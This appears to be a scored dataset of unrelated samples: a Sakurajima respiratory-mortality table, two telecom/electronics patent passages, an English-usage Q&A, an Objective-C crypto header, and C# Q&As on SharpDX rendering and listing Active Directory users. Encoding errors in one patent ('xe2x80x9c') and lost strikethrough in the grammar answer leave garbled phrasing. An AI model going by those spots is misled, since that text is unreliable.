include the examination of indoor levels of crystalline silica. ![Map of Mt. Sakurajima and the study areas.](JEPH2012-257831.001){#fig1} ###### SMR of respiratory diseases during the period 1968--2002. Sakurajima + Tarumizu Kanoya ---------------------------------------------------------- ----------------------- -------- ------ ------------ ----- ------- ------ ------------ Lung cancer (ICD 9th: 162) Males 353 219.4 1.61 1.44--1.78 544 628.4 0.87 0.79--0.94 Females 138 82.4 1.67 1.39--1.95 165 222.0 0.74 0.63--0.86 COPDs (ICD 9th: 490--496) Males 252 140.3 1.80 1.68--1.91 267 375.6 0.71 0.63--0.80 Females 134 72.5 1.85 1.53--2.16 132 201.6 0.65 0.54--0.77 Acute respiratory diseases (ICD 9th: 460--466, 480--487) Males 389 331.1 1.17 1.06--1.29 845 945.8 0.89 0.83--0.95 Females 339 320.9 1.06 0.95--1.17 721 854.6 0.84 0.78--0.91 \*Observed and expected numbers of death. [^1]: Academic Editor: Edward Trapido
Mid
[ 0.6366047745358091, 30, 17.125 ]
1. Field of the Invention This invention relates to digital wireless communication systems, and more particularly to methods for detecting forward and reverse link imbalances in digital wireless communications systems. 2. Description of Related Art Wireless communication systems facilitate two-way communication between a plurality of subscriber mobile radio stations or xe2x80x9cwireless unitsxe2x80x9d and a fixed network infrastructure. Typically, the wireless units communicate with the fixed network infrastructure via a plurality of fixed base stations. Exemplary systems include such mobile cellular telephone systems as Time Division Multiple Access (TDMA) and Code Division Multiple Access (CDMA) systems, and Frequency Division Multiple Access (FDMA) systems. The objective of these digital wireless communication systems is to provide communication channels on demand between the wireless units and the base stations in order to connect the wireless unit users with the fixed network infrastructure (usually a wired-line system). Wireless units typically communicate with base stations using a duplexing scheme that allows for the exchange of information in both directions of connection. Transmissions from a base station to a wireless unit are commonly referred to as xe2x80x9cdownlinkxe2x80x9d transmissions. Transmissions from a wireless unit to a base station are commonly referred to as xe2x80x9cuplinkxe2x80x9d transmissions. In CDMA and FDMA communication systems, the downlink is commonly referred to as the xe2x80x9cforwardxe2x80x9d link and the uplink is commonly referred to as the xe2x80x9creversexe2x80x9d link. A well-known problem in cellular communication systems is system performance degradation caused by signal strength imbalances in the forward and reverse links. To mitigate this problem, cellular communication system designers attempt to ensure that signal path losses tolerated by the reverse links are equal to or approximately equal to those tolerated by the forward links. One important design objective is to balance the forward and reverse links. Unfortunately, due to dynamically changing network conditions such as system loading, antenna pattern mismatches, differences in antenna gains, and other channel variations, imbalances still occur. In cellular communication systems such as CDMA and FDMA, forward and reverse link imbalances often cause degraded system performance. Therefore, balancing the forward and reverse links is a very important design goal in wireless digital communication systems. Unless the links are balanced, system performance is degraded. For example, under weak reverse link conditions (i.e., the reverse link is weaker than the forward link) wireless units attempt to access their associated base stations by generating multiple access probes until all of the access probes are exhausted. These multiple access attempts result in increased channel interference on the reverse link. Under weak forward link conditions (i.e., the forward link is weaker than the reverse link) wireless units are unable to receive acknowledgment messages on their associated forward links. Consequently, the wireless units will not declare service, initiate calls, nor respond to base station orders. Unfortunately, link imbalances are indiscernible by the prior art wireless units. Consequently, the prior art wireless units exhibit undesirable behavior in the presence of link imbalances. For example, in a weak reverse link condition, the prior art wireless units can become locked into a digital mode of operation when the digital system is, in fact, unavailable for service. This occurs when the wireless unit receives a strong signal on the forward link paging channel. However, the reverse link is weak. Although the wireless unit is unable to register or originate calls on the reverse link, it believes that digital service is available due to the strong paging channel signal. Therefore, even though an alternative analog system may be available, the mobile is locked into a useless digital mode of operation. Performance also degrades when the reverse link is stronger than the forward link. Under these conditions, the wireless unit can communicate with the base station. However, because of the relatively weak forward link, the wireless unit cannot decipher the control information transmitted by the base station. In either scenario, calls are disadvantageously lost, and system call delivery rates are reduced. A better understanding of the performance problems created by link imbalances can be obtained by briefly reviewing simple call flow examples in a CDMA communication system. CDMA Call Flow Examples and CDMA Call Handshake Protocols Tables 1 and 2 show simple call flow examples as set forth in the Telecommunications Industry Association (TIA) specification governing the operation of CDMA wireless unit and base station equipment. The TIA specification is entitled xe2x80x9cWireless unit-Base Station Compatibility Standard for Dual-Mode Wideband Spread Spectrum Cellular System,xe2x80x9d TIA/EIA/IS-95-A, was published in May 1995 by the Telecommunications Industry Association, and is referred to hereafter as the IS-95 specification. As set forth in the IS-95 specification, Tables 1 and 2 follow the following conventions: All messages are received without error. Receipt of messages is not shown (except in the handoff examples). Acknowledgements are not shown. Optional authentication procedures are not shown. Optional private long code transitions are not shown. Table 1 shows a simple call flow example wherein a wireless unit originates a call. Messages are transmitted from the wireless unit to the base station using the access channel. Messages are transmitted from the base station to the wireless unit using the paging channel. As shown in Table 1, the wireless unit first detects a user-initiated call, and then sends an xe2x80x9coriginationxe2x80x9d message via the CDMA access channel. The access channel is a slotted random access channel. The wireless unit transmits on the access channel using a random access procedure. Many parameters of the random access procedure are supplied by the base station in an access parameters message. The entire process of transmitting one message and receiving (or failing to receive) an acknowledgement for that message is called an xe2x80x9caccess attempt.xe2x80x9d Each transmission in the access attempt is called an xe2x80x9caccess probe.xe2x80x9d Within an access attempt, access probes are grouped into access probe sequences. Each access probe sequence comprises a fixed number of access probes. The first access probe of each access probe sequence is transmitted at a specified power level relative to the nominal open loop power level. Each subsequent access probe is transmitted at a power level that is a specified amount higher than the previous access probe. During normal CDMA operation, when a wireless unit user initiates a phone call, the wireless unit sends an access probe to the base station. If the base station properly receives the access probe, the wireless unit should receive back an acknowledgement from the base station. Once the wireless unit receives the acknowledgement, the wireless unit is instructed by the base station to wait and to stop sending further access probes to the base station. This is necessary because too many access probes will produce undesirable interference on the communication channel. The wireless unit therefore waits until it is assigned a communication channel by the base station. As shown in Table 1, the base station informs the wireless unit of the channel assignment by sending a channel assignment message via the paging channel. Once the wireless unit receives its channel assignment from the base station, it changes its receive and transmit frequencies to the assigned channel. The wireless unit then attempts to initiate communication on the assigned channel by establishing or xe2x80x9csetting upxe2x80x9d the traffic channel. If the traffic channel initialization is successful, the wireless unit then acquires the traffic channel. The wireless unit then begins sending a traffic channel preamble. As shown in Table 1, the base station acquires the reverse traffic channel and sends a base station acknowledgement order to the wireless unit if the reverse traffic channel was properly acquired. At this point, the wireless unit and the base station begin negotiating service. The communication link can fail at any point during this negotiation process. However, if the negotiation process is successful, communication commences, and a telephone conversation commences. Table 2 shows a simple call flow example wherein a wireless unit terminates a call. As shown in Table 2, during normal operation, when a call is initiated by a base station the base station sends a page or slotted page message to the wireless unit via the paging channel. The wireless unit then sends a page response message to the base station via the access channel. The base station then establishes a traffic channel and begins sending null traffic channel data to the wireless unit. The base station then sends a channel assignment message to the wireless unit via the paging channel. As described above with reference to Table 1, once the wireless unit receives its channel assignment from the base station, it changes its receive and transmit frequencies to the assigned channel. The wireless unit then attempts to initiate communication on the assigned channel by setting up the traffic channel. As before, if the traffic channel initialization is successful, the wireless unit acquires the traffic channel and processes primary traffic. Soon thereafter, if the communication negotiation is successful, communication commences via the forward and reverse channel pair. With the call flow examples in mind, it is now possible to more fully describe the problems created by link imbalances in a cellular communication system. Call Delivery Failures due to Link Imbalances Under some network conditions, the forward link is intentionally made stronger than the reverse link resulting in an extended CDMA forward link coverage area. In areas with neighboring analog cells, it is possible for a dual mode wireless unit to receive a valid signal on the CDMA paging channel while in the analog coverage area. As described above, this causes the wireless unit to lock into a digital (in this case, CDMA) mode of operation. Disadvantageously however, the wireless unit will be unable to register or originate a call within the CDMA cell because it is beyond its reverse link coverage range. Stated another way, under these network conditions, wireless units become confused into relying upon valid CDMA coverage when, in fact, there is none. Disadvantageously, the wireless unit is unaware of the link imbalance problem. Rather than locking into a digital operational mode, the dual mode wireless units preferably should remain in an analog operational mode. In contrast, network conditions exist wherein the reverse link is stronger than the forward link. For example, in personal communication systems (PCS), the reverse link is favored due to weak coding characteristics of the link and also due to inherent limitations of the high power amplifier (HPA). The coding characteristics of the 13 kb/s link can cause the forward link to be weaker than the reverse link. Coding for the 13 kb/s PCS systems is not as robust or efficient as is the coding for the 8 kb/s systems. In addition, the HPA has a limited amount of power, and therefore can cause the forward link to be weaker than the reverse link under certain circumstances. Consequently, calls fail either during call setup due to the fading characteristics of the paging channel or during forward traffic channel initialization. Other factors contribute to link imbalance conditions. Link imbalances can be caused by variations in base station antenna gains and antenna pattern mismatches. In addition, greater path loss in the forward link relative to the reverse link can cause the forward link to be weaker than the reverse link. Additionally, co-channel interference from neighboring base stations can result in weaker forward links. In accordance with the IS-95 specification, each CDMA base station continuously transmits an unmodulated, direct-sequence spread spectrum signal referred to as the xe2x80x9cpilot channelxe2x80x9d. The pilot channel is transmitted at all times by the base station on each active forward CDMA channel. In addition to facilitating other wireless unit functions, the pilot channels allow the wireless units to perform signal strength comparisons between base stations. Unfortunately, the pilot channels of nearby base stations can interfere with one another resulting in weak forward channel strengths. The interfering pilot channels may or may not be on a wireless unit""s neighbor list. Also, weak forward link conditions may be caused by interference sources that are external to the CDMA system. Finally, weak forward links can occur due to inadequate traffic channel power allocation at initialization. Weak forward channel conditions are characterized by poor paging channel performance, which can cause the paging channels to be lost while the wireless unit is in the System Access State. Weak forward channel conditions can also lead to Traffic Channel Initialization failures, failures in receiving Channel Assignment messages, and failures in receiving Base Station Acknowledgement Orders. Whether a wireless unit is attempting to originate or to terminate a call, the call can be lost due to link imbalances. In both cases, call delivery rates will suffer. In addition, system performance is adversely affected when active in-progress calls (i.e., wireless units having active traffic channels carrying in-progress calls) are dropped due to link imbalance conditions. Therefore the need exists for a method and apparatus that detects link imbalances and instructs the wireless unit to process calls in accordance with the detection. The need exists for a method and apparatus that can detect link imbalances in a cellular communication system and process calls accordingly. The need exists for a means for determining whether in-progress calls are dropped due to link imbalance conditions, and if so, for taking appropriate corrective action. The present invention provides such a method and apparatus. The present invention detects link imbalances in a cellular communication system, determines the relative strengths of the forward and reverse links, and processes calls (originated, terminated and dropped calls) according to the determination. The present invention is a novel method and apparatus for detecting forward and reverse link imbalances in a digital cellular communication system and for processing calls accordingly. The present invention improves call delivery rates in a digital cellular communication system by detecting forward and reverse link imbalances, determining which link is weaker, and processing calls in accordance with the determination. The present invention improves system performance by determining whether in-progress calls are dropped due to link imbalance conditions. If so, the present invention takes corrective action during subsequent system accesses. In a weak reverse link condition, the wireless unit receives a strong received signal strength indication (RSSI) on the forward link, but is unable to communicate using the access channel. Each time the wireless unit attempts to access the digital system, it exhausts all of its assigned access probes, and thereby fails the access process. In contrast, weak forward link conditions are characterized by poor paging channel performance, resulting in the loss of the paging channel. The wireless unit is unable to initiate or receive calls because it cannot receive control information via the paging channel. The present inventive method determines whether a failure has occurred in either the forward or reverse link. If a failure occurs in either link, the present inventive method determines whether the failure is due to a link imbalance condition. When link imbalances are detected, the present invention uses the link failure cause to determine which link is weaker. Based on this determination, the present invention takes corrective action to establish or re-establish calls. More specifically, in one embodiment of the present invention, the method detects weak reverse link conditions by determining whether a wireless unit has attempted to access a selected base station a predetermined number of times (i.e., whether a maximum number of access probes has been transmitted by the mobile). If so, the method of the present invention switches operation to a secondary digital system (or to an analog system if the secondary digital system attempt fails). In one embodiment, the present inventive method detects weak forward link conditions by detecting failures in either the paging channel or the traffic channel. If the paging channel is lost, the method determines whether a traffic channel initialization (TCI) timeout occurred. If not, the mobile returns to normal operation, and no link imbalance is found. However, if a TCI timeout occurred, the wireless unit determines what caused the paging channel to be lost. The present method tests the pilot strength to determine whether the paging channel was lost because the wireless unit is too far from the base station, or because of significant interference on the paging channel. The method tests to determine whether another strong pilot channel exists. If so, the method instructs the wireless unit to perform an idle handoff and establish communication with the strong pilot channel. If not, the method causes the wireless unit to perform a xe2x80x9cnew system exit.xe2x80x9d The details of the preferred and alternative embodiments of the present invention are set forth in the accompanying drawings and the description below. Once the details of the invention are known, numerous additional innovations and changes will become obvious to one skilled in the art.
Mid
[ 0.5596330275229351, 30.5, 24 ]
Q: Is this sentence missing a noun? I know in some cases a prepositional phrase can be a complement to another prepositional phrase, but this sentence just sounds like it is missing a noun. So I made myself this little promise that I would reserve my lies for other than my public life. (a line from Primal Fear) It sounds jarring as it seems to be missing a noun after the preposition "for", for example, "things": So I made myself this little promise that I would reserve my lies for things other than my public life. It seems strange to me to have "other than my public life" function as the object/complement to "for". Is a noun necessary here? A: It's not missing a noun: it has a pronoun! Here other can be read as being a pronoun. This is an example of what the OED describes in other sense 7 under section B for nominal (and pronominal) uses: B. pron. and n. I. As pronoun. Another thing; something else; anything else. Chiefly in negative contexts, esp. in no other. Frequently with than. Now somewhat archaic or literary. Here’s one of the more recent citations (which begin all the way back in Bede’s Old English!): 1991 Index on Censorship Jan. 6/1 With their former monopoly virtually intact the old nomenklatura..have little incentive to do other than support present government policy. Some of the older citations provide some common variants for context: 1791 Thomas Paine Rights of Man i. 97 With respect to the Cour Plénière, it was no other than a medium through which despotism was to pass, without appearing to act directly from itself. 1826 James Fenimore Cooper Last of Mohicans I. ix. 121 With two such examples of courage before him, a man would be ashamed to prove other than a hero. 1895 The Westminster Gazette 25 July 4/2 He thought he could not do other than send the two prisoners for trial. If those all sound “somewhat literary” to you per their label, then that might be why your original felt funny. But it’s just fine, really. You can rephrase those citations swapping in anything/nothing but in place of other than: With their former monopoly virtually intact the old nomenklatura..have little incentive to do other than anything but support present government policy. With respect to the Cour Plénière, it was other than nothing but a medium through which despotism was to pass, without appearing to act directly from itself. With two such examples of courage before him, a man would be ashamed to prove other than anything but a hero. He thought he could not do other than anything but send the two prisoners for trial. Just as one can with your original: So I made myself this little promise that I would reserve my lies for other than anything but my public life.
Mid
[ 0.5977961432506881, 27.125, 18.25 ]
// // CryptoManager.h // Moonlight // // Created by Diego Waxemberg on 10/14/14. // Copyright (c) 2014 Moonlight Stream. All rights reserved. // @interface CryptoManager : NSObject + (void) generateKeyPairUsingSSL; + (NSData*) readCertFromFile; + (NSData*) readKeyFromFile; + (NSData*) readP12FromFile; + (NSData*) getSignatureFromCert:(NSData*)cert; + (NSData*) pemToDer:(NSData*)pemCertBytes; - (NSData*) createAESKeyFromSaltSHA1:(NSData*)saltedPIN; - (NSData*) createAESKeyFromSaltSHA256:(NSData*)saltedPIN; - (NSData*) SHA1HashData:(NSData*)data; - (NSData*) SHA256HashData:(NSData*)data; - (NSData*) aesEncrypt:(NSData*)data withKey:(NSData*)key; - (NSData*) aesDecrypt:(NSData*)data withKey:(NSData*)key; - (bool) verifySignature:(NSData *)data withSignature:(NSData*)signature andCert:(NSData*)cert; - (NSData*) signData:(NSData*)data withKey:(NSData*)key; @end
Mid
[ 0.5589743589743591, 27.25, 21.5 ]
Q: C#: SharpDX - Draw Basic Stars The Issue I've been searching for an answer to this issue for a few days now. I need help finding a way to generate a basic star. I have the code to randomly generate the locations done; however, I am new to DirectX and came from the world of XNA and Unity. DirectX development seems overly-complicated at the best of times. I have found a few tutorials, but, I am finding them difficult to follow. I have been unable to render anything to the screen once I've cleared it. I'm using the basic setup as far as rendering goes, I haven't created any special classes or structs. I have been trying to follow the Richard's Software tutorials that were converted to C# from C++ in the book 3D Game Programming With DirectX 11 by Frank D. Luna. The farthest I have been able to successfully complete was clearing to Color.CornflowerBlue. Question(s) Are there any simplistic methods to draw/render objects to the screen, I'm able to render text just fine, but images (sprites) and 3D meshes seem to be giving me issues. Is there a simplistic method to draw basic geometric shapes? For example: Primitives.DrawSphere(float radius, Vector3 location, Color c); If there aren't any simplistic methods available to draw primitives, what is going to be the simplest approach to rendering stars? I can do spheres, sprites with alpha blending to simulate distance, billboards, etc. What will be the simplest method to implement? How do I implement the simplest method revealed by question 2 above? Code samples, tutorials (no videos), articles, etc. are greatly appreciated as I am having a hard time tracking down good C# references, it would appear that most are utilizing Unity and Unreal these days, but I don't have those options. Notes I work in a government environment and am unable to utilize third party tools that haven't been approved. The approval process is a nightmare so third party tools are typically a no go. All supplied answers, documentation, samples, etc. should be strictly utilizing SharpDX. My Code My project is a WindowsFormsApplicaiton where the primary form has been derived from RenderForm. I have created a single class called Engine that handles the DirectX code. Engine.cs: internal class Engine : IDisposable { #region Fields private Device device; private SwapChain swapChain; private DeviceContext context; private Texture2D backBuffer; private RenderTargetView renderView; private SynchronizationContext syncContext; #endregion #region Events public event EventHandler Draw; public event EventHandler Update; private void SendDraw(object data) { Draw(this, new EventArgs()); } private void SendUpdate(object data) { Update(this, new EventArgs()); } #endregion #region Constructor(s) public Engine(RenderForm form) { SwapChainDescription description = new SwapChainDescription() { ModeDescription = new ModeDescription(form.Width, form.Height, new Rational(60, 1), Format.R8G8B8A8_UNorm), SampleDescription = new SampleDescription(1, 0), Usage = Usage.RenderTargetOutput, BufferCount = 1, OutputHandle = form.Handle, IsWindowed = !form.IsFullscreen }; Device.CreateWithSwapChain(DriverType.Hardware, DeviceCreationFlags.Debug, description, out device, out swapChain); backBuffer = Resource.FromSwapChain<Texture2D>(swapChain, 0); renderView = new RenderTargetView(device, backBuffer); context = device.ImmediateContext; context.OutputMerger.SetRenderTargets(renderView); context.Rasterizer.SetViewport(new Viewport(0, 0, form.Width, form.Height)); renderForm = form; } #endregion #region Public Methods public void Initialize() { if (SynchronizationContext.Current != null) syncContext = SynchronizationContext.Current; else syncContext = new SynchronizationContext(); RenderLoop.Run(renderForm, delegate() { context.ClearRenderTargetView(renderView, Color.CornflowerBlue); syncContext.Send(SendUpdate, null); syncContext.Send(SendDraw, null); swapChain.Present(0, 0); }); } public void Dispose() { } #endregion } Form1.cs: public partial class Form1: RenderForm { private Engine gameEngine; int count = 0; public Form1() { InitializeComponent(); gameEngine = new Engine(this); gameEngine.Update += GameEngine_Update; gameEngine.Draw += GameEngine_Draw; gameEgnine.Initialize(); } private void GameEngine_Update(object sender, EventArgs e) => Debug.WriteLine("Updated."); private void GameEngine_Draw(object sender, EventArgs e) => Debug.WriteLine($"I've drawn {++count} times."); } Final Remarks Any help is appreciated at this point because its going on day 4 and I am still struggling to understand most of the DirectX 11 code. I am by no means new to C# or development; I am just used to Windows Forms, ASP.NET, Unity, XNA, WPF, etc. This is my first experience with DirectX and its definitely over the top. Even worse than when I tried OpenGL ten years ago with hardly any development experience at all. A: Few things to start with. First, DirectX is a very low level API. The only way to get a lower level API on Windows is to go talk to the graphics driver directly, which would be even more of a nightmare. As a result, things tend to be extremely generic, which allows for high flexibility at the cost of being fairly complicated. If you ever wondered what Unity or Unreal were doing under the hood, this is it. Second, DirectX, and Direct3D in particular, is written in and for C++. C# resources are hard to come by because the API wasn't really intended for use from C# (not that that's a good thing). As a result, discarding the documentation and answers written for C++ is a really bad idea. All the caveats and restrictions on the C++ API also apply to you in the C# world, and you will need to know them. Third, I will not be able to provide you an entirely C#/SharpDX answer, since I don't use DirectX from C#, but from C++. I'll do what I can to provide accurate mappings, but be aware you are using an API wrapper, which can and will hide some of the details from you. Best option to discover those details would be to have the source code of SharpDX up as you go through the C++ documentation. Now on to the questions you have. Strap in, this will be long. First up: there's no simple way to render a primitive object in Direct3D 11. Rendering a six faced cube has the same steps as rendering a 200 million vertex mesh of New York City. In the rendering loop, we need to do several actions to render anything. In this list, you've already done step 1 and 7, and partially done step 2: Clear the back buffer and depth/stencil buffers. Set the input layout, shaders, pipeline state objects, render targets, and viewports used in the current rendering pass. Set the vertex buffer, index buffer, constant buffers, shader resources and samplers used by the current mesh being drawn. Issue the draw call for the given mesh. Repeat steps 3 and 4 for all meshes that must be drawn in the current rendering pass. Repeat steps 2 through 5 for all passes defined by the application. Present the swap chain. Fairly complex, just to render something as simple as a cube. This process needs several objects, of which we already have a few: A Device object instance, for creating new D3D objects A DeviceContext object instance, for issuing drawing operations and setting pipeline state A DXGI.SwapChain object instance, to manage the back buffer(s) and present the next buffer in the chain to the desktop A Texture2D object instance, to represent the back buffer owned by the swap chain A RenderTargetView object instance, to allow the graphics card to use a texture as the destination for a rendering operation A DepthStencilView object instance, if we're are using the depth buffer VertexShader and PixelShader object instances, representing the shaders used by the GPU during the vertex and pixel shader stages of the graphics pipeline An InputLayout object instance, representing the exact layout of one vertex in our vertex buffer A set of Buffer object instances, representing the vertex buffers and index buffers containing our geometry and the constant buffers containing parameters for our shaders A set of Texture2D object instances with associated ShaderResourceView object instances, representing any textures or surface maps to be applied to our geometry A set of SamplerState object instances, for sampling the above textures from our shaders A RasterizerState object instance, to describe the culling, depth biasing, multisampling, and antialiasing parameters the rasterizer should use A DepthStencilState object instance, to describe how the GPU should conduct the depth test, what causes a depth test fail, and what a fail should do A BlendState object instance, to describe how the GPU should blend multiple render targets together Now, what does this look like as actual C# code? Probably something like this (for rendering): //Step 1 - Clear the targets // Clear the back buffer to blue context.ClearRenderTargetView(BackBufferView, Color.CornflowerBlue); // Clear the depth buffer to the maximum value. context.ClearDepthStencilView(DepthStencilBuffer, DepthStencilClearFlags.Depth, 1.0f, 0); //Step 2 - Set up the pipeline. // Input Assembler (IA) stage context.InputAssembler.InputLayout = VertexBufferLayout; // Vertex Shader (VS) stage context.VertexShader.Set(SimpleVertexShader); // Rasterizer (RS) stage context.Rasterizer.State = SimpleRasterState; context.Rasterizer.SetViewport(new Viewport(0, 0, form.Width, form.Height)); // Pixel Shader (PS) stage context.PixelShader.Set(SimplePixelShader); // Output Merger (OM) stage context.OutputMerger.SetRenderTargets(DepthStencilBuffer, BackBufferView); context.OutputMerger.SetDepthStencilState(SimpleDepthStencilState); context.OutputMerger.SetBlendState(SimpleBlendState); //Step 3 - Set up the geometry // Vertex buffers context.InputAssembler.PrimitiveTopology = PrimitiveTopology.TriangleList; context.InputAssembler.SetVertexBuffers(0, new VertexBufferBinding(VertexBuffer, sizeof(Vertex), 0)); // Index buffer context.InputAssembler.SetIndexBuffer(IndexBuffer, Format.R16_UInt, 0); // Constant buffers context.VertexShader.SetConstantBuffer(0, TransformationMatrixBuffer); context.PixelShader.SetConstantBuffer(0, AmbientLightBuffer); // Shader resources context.PixelShader.SetShaderResource(0, MeshTexture); // Samplers context.PixelShader.SetSampler(0, MeshTextureSampler); //Step 4 - Draw the object context.DrawIndexed(IndexBuffer.Count, 0, 0); //Step 5 - Advance to the next object and repeat. // No next object currently. //Step 6 - Advance to the next pipeline configuration // No next pipeline configuration currently. //Step 7 - Present to the screen. swapChain.Present(0, 0); The vertex and pixel shaders in this example code expect: A model with position, normal, and texture coordinates per vertex The position of the camera in world space, the world-view-projection matrix, world inverse transpose matrix, and world matrix as a vertex shader constant buffer The ambient, diffuse, and specular colors of the light, as well as its position in the world, as a pixel shader constant buffer The 2D texture to apply to the surface of the model in the pixel shader, and The sampler to use when accessing the pixels of the above texture. Now the rendering code itself is fairly simple - the setup is the harder part of it: //Create the vertex buffer VertexBuffer = new Buffer(device, RawVertexInfo, new BufferDescription { SizeInBytes = RawVertexInfo.Length * sizeof(Vertex), Usage = ResourceUsage.Default, BindFlags = BindFlags.VertexBuffer, CpuAccessFlags = CpuAccessFlags.None, OptionFlags = ResourceOptionFlags.None, StructureByteStride = sizeof(Vertex) }); //Create the index buffer IndexCount = (int)RawIndexInfo.Length; IndexBuffer = new Buffer(device, RawIndexInfo, new BufferDescription { SizeInBytes = IndexCount * sizeof(ushort), Usage = ResourceUsage.Default, BindFlags = BindFlags.IndexBuffer, CpuAccessFlags = CpuAccessFlags.None, OptionFlags = ResourceOptionFlags.None, StructureByteStride = sizeof(ushort) }); //Create the Depth/Stencil view. Texture2D DepthStencilTexture = new Texture2D(device, new Texture2DDescription { Format = Format.D32_Float, BindFlags = BindFlags.DepthStencil, Usage = ResourceUsage.Default, Height = renderForm.Height, Width = renderForm.Width, ArraySize = 1, MipLevels = 1, SampleDescription = new SampleDescription { Count = 1, Quality = 0, }, CpuAccessFlags = 0, OptionFlags = 0 }); DepthStencilBuffer = new DepthStencilView(device, DepthStencilTexture); SimpleDepthStencilState = new DepthStencilState(device, new DepthStencilStateDescription { IsDepthEnabled = true, DepthComparison = Comparison.Less, }); //default blend state - can be omitted from the application if defaulted. SimpleBlendState = new BlendState(device, new BlendStateDescription { }); //Default rasterizer state - can be omitted from the application if defaulted. SimpleRasterState = new RasterizerState(device, new RasterizerStateDescription { CullMode = CullMode.Back, IsFrontCounterClockwise = false, }); // Input layout. VertexBufferLayout = new InputLayout(device, VertexShaderByteCode, new InputElement[] { new InputElement { SemanticName = "POSITION", Slot = 0, SemanticIndex = 0, Format = Format.R32G32B32_Float, Classification = InputClassification.PerVertexData, AlignedByteOffset = 0, InstanceDataStepRate = 0, }, new InputElement { SemanticName = "NORMAL", Slot = 0, SemanticIndex = 0, Format = Format.R32G32B32_Float, Classification = InputClassification.PerVertexData, AlignedByteOffset = InputElement.AppendAligned, InstanceDataStepRate = 0, }, new InputElement { SemanticName = "TEXCOORD0", Slot = 0, SemanticIndex = 0, Format = Format.R32G32_Float, Classification = InputClassification.PerVertexData, AlignedByteOffset = InputElement.AppendAligned, InstanceDataStepRate = 0, }, }); //Vertex/Pixel shaders SimpleVertexShader = new VertexShader(device, VertexShaderByteCode); SimplePixelShader = new PixelShader(device, PixelShaderByteCode); //Constant buffers TransformationMatrixBuffer = new Buffer(device, new BufferDescription { SizeInBytes = sizeof(TransformationMatrixParameters), BindFlags = BindFlags.ConstantBuffer, Usage = ResourceUsage.Default, CpuAccessFlags = CpuAccessFlags.None, }); AmbientLightBuffer = new Buffer(device, new BufferDescription { SizeInBytes = sizeof(AmbientLightParameters), BindFlags = BindFlags.ConstantBuffer, Usage = ResourceUsage.Default, CpuAccessFlags = CpuAccessFlags.None, }); // Mesh texture MeshTexture = new Texture2D(device, new Texture2DDescription { Format = Format.B8G8R8A8_UNorm, BindFlags = BindFlags.ShaderResource, Usage = ResourceUsage.Default, Height = MeshImage.Height, Width = MeshImage.Width, ArraySize = 1, MipLevels = 0, CpuAccessFlags = CpuAccessFlags.None, OptionFlags = ResourceOptionFlags.None, SampleDescription = new SampleDescription { Count = 1, Quality = 0, } }); //Shader view for the texture MeshTextureView = new ShaderResourceView(device, MeshTexture); //Sampler for the texture MeshTextureSampler = new SamplerState(device, new SamplerStateDescription { AddressU = TextureAddressMode.Clamp, AddressV = TextureAddressMode.Clamp, AddressW = TextureAddressMode.Border, BorderColor = new SharpDX.Mathematics.Interop.RawColor4(255, 0, 255, 255), Filter = Filter.MaximumMinMagMipLinear, ComparisonFunction = Comparison.Never, MaximumLod = float.MaxValue, MinimumLod = float.MinValue, MaximumAnisotropy = 1, MipLodBias = 0, }); As you can see, there's a lot of stuff to get through. As this has already gotten a lot longer than most people have the patience for, I'd recommend getting and reading the book by Frank D. Luna, as he does a much better job of explaining the pipeline stages and the expectations Direct3D has of your application. I'd also recommend reading through the C++ documentation for the Direct3D API, as, again, everything there will apply to SharpDX. In addition, you'll want to look into HLSL, as you'll need to define and compile a shader to make any of the above code even work, and if you want any texturing, you'll need to figure out how to get the image data into Direct3D. On the bright side, if you manage to implement all of this in a clean, extensible manner, you'll be able to render practically anything with little additional effort.
Mid
[ 0.5741626794258371, 30, 22.25 ]
Q: How to list all users in Active Directory in DropDownList Control I am using Visual Studio 2005 C#. I am trying to retrieve the list of users in my Active Directory and insert them into a DropDownList control. May I know how do I pull out the users and how can I insert them into the DropDownList control? EDIT: There are many parts of the functionality I would wish to complete. Firstly is to list all users in a DropDownList, and having 2 checkboxes, User and Admin, and base on the role assigned to the user in the DDL, appropriate checkboxes will be checked. Checking and unchecking of the role checkboxes will also assign/revoke the roles accordingly. A: If you're on .NET 3.5 and up, you can use a PrincipalSearcher and a "query-by-example" principal to do your searching: // create your domain context PrincipalContext ctx = new PrincipalContext(ContextType.Domain); // define a "query-by-example" principal - here, we search for all users UserPrincipal qbeUser = new UserPrincipal(ctx); // create your principal searcher passing in the QBE principal PrincipalSearcher srch = new PrincipalSearcher(qbeUser); // find all matches foreach(var found in srch.FindAll()) { // do whatever here - "found" is of type "Principal" - it could be user, group, computer..... } If you haven't already - absolutely read the MSDN article Managing Directory Security Principals in the .NET Framework 3.5 which shows nicely how to make the best use of the new features in System.DirectoryServices.AccountManagement This code could be rather slow - especially if you have a large AD, and a large number of users in your AD. But then again: is it really helpful to list thousands of users in a single drop down?? You might need to rethink your strategy there.... Update: if you cannot use .NET 3.5, you'll have to use the "legacy" DirectorySearcher class instead - something like this: // find your default naming context DirectoryEntry deRoot = new DirectoryEntry("LDAP://RootDSE"); string defaultCtx = deRoot.Properties["defaultNamingContext"].Value.ToString(); // define a directory searcher for your default context string searchRootLDAPPath = "LDAP://" + defaultCtx; DirectoryEntry defaultDE = new DirectoryEntry(searchRootLDAPPath); // define searcher - search through entire subtree, search for users // (objectCategory=Person) DirectorySearcher dsAllUsers = new DirectorySearcher(defaultDE); dsAllUsers.SearchScope = SearchScope.Subtree; dsAllUsers.Filter = "(objectCategory=Person)"; // get the results SearchResultCollection result = dsAllUsers.FindAll(); // count the user objects found int count = result.Count; As I mentioned - this will not perform very well on a large AD, and you might run into limits (like max. of 1'000 users returned) and other issues. You should maybe allow users to search for users, e.g. by their name or something - rather than listing out all your users (depending on the size of your AD).
Mid
[ 0.6487804878048781, 33.25, 18 ]
Along with sophistication of features of electronic device, the wiring in a wiring board is getting more complex and the number of wiring is increasing. On the other hand, the compactness of the electronic device is demanded from the viewpoint of convenience. In efforts to satisfy such inconsistent requests, a means for transmitting signals in the form of serial data so as to reduce the number of wiring has been adopted in the past. A protocol or method “serial peripheral interface (SPI)” stipulating channels in control device, or more particularly, communications among a micro-processing unit and peripheral input/output (I/O) devices has prevailed in the past. Document 1 “Data Sheet TLE4230 GP (Infineon Technologies AG, Bereichs Kommunikation, Aug. 28, 2000)” describes an example of a peripheral input/output device (output driver) using an SPI. A power element described in Document 1 or the like can control the output thereof via either an SPI or an individual signal line. According to the method, an output whose on-off cycle is long such as an output of a relay is controlled through serial communication represented by the SPI method. Consequently, the number of signal lines to be used for control can be largely reduced. Moreover, an output that repeats on-off at intervals of a short cycle such as an output of a pulse-width modulator (PWM) is controlled as an individual signal. Consequently, fast on-off can be achieved during serial communication without the 